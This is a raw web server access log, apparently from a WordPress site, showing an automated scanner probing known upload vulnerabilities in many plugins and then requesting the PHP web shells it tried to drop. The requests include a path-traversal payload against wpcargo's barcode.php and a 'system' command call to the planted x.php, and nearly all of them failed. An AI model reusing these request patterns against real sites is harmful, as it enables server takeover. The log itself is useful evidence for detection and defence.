-	11:27:02	-0500	POST //wp-content/plugins/dzs-zoomsounds/savepng.php?location=a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:02	-0500	GET //wp-content/plugins/dzs-zoomsounds/a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:16	-0500	POST /wp-content/plugins/ioptimizations/IOptimizes.php?hamlorszd HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:17	-0500	GET /wp-content/plugins/ioptimizations/a57bze8931.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:37	-0500	POST /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:38	-0500	GET /wp-content/plugins/ioptimization/a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:46	-0500	POST /wp-content/plugins/wp-engine-module/wp-engine.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:47	-0500	GET /wp-content/plugins/wp-engine-module/a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:52	-0500	POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1	403	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:52	-0500	GET /wp-content/uploads/kaswara/fonts_icon/a57bze8931/.__a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:57	-0500	POST /wp-content/plugins/apikey/apikey.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:27:57	-0500	GET /wp-content/plugins/apikey/a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:08	-0500	POST /wp-content/plugins/cherry-plugin/admin/import-export/upload.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:08	-0500	GET /wp-content/plugins/cherry-plugin/admin/import-export/a57bze8931.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:26	-0500	POST /wp-content/plugins/formcraft/file-upload/server/php/ HTTP/1.1	403	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:26	-0500	GET /wp-content/plugins/formcraft/file-upload/server/php/files/a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:45	-0500	POST /wp-admin/admin-ajax.php HTTP/1.1	403	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:45	-0500	GET /wp-content/uploads/typehub/custom/a57bze8931/.__a57bze8931.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:53	-0500	POST /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/import.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:28:53	-0500	GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/SSF_WP_UPLOADS_PATH/csv/import/abruzi.php HTTP/1.1	404	7174	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:11	-0500	POST /wp-admin/admin-ajax.php HTTP/1.1	403	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:12	-0500	GET /abruzi.php4 HTTP/1.1	403	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:16	-0500	POST /wp-json/wp_live_chat_support/v1/remote_upload HTTP/1.1	403	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:16	-0500	GET /wp-content/uploads/wp_live_chat/abruzi.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:20	-0500	POST /wp-admin/admin.php?page=html2wp-settings HTTP/1.1	403	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:21	-0500	GET /wp-content/uploads/html2wp/abruzi.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:25	-0500	GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:25	-0500	POST /wp-content/x.php?1=system HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:26	-0500	GET /wp-content/king.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:42	-0500	GET /wp-admin/admin-ajax.php?action=p3dlite_handle_upload HTTP/1.1	400	11	-	python-requests/2.28.1
-	11:29:42	-0500	GET /wp-admin/admin-ajax.php?action=_ning_upload_image HTTP/1.1	403	7173	-	python-requests/2.28.1
-	11:29:43	-0500	GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
-	11:29:51	-0500	GET /wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php HTTP/1.1	404	7173	www.google.com	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
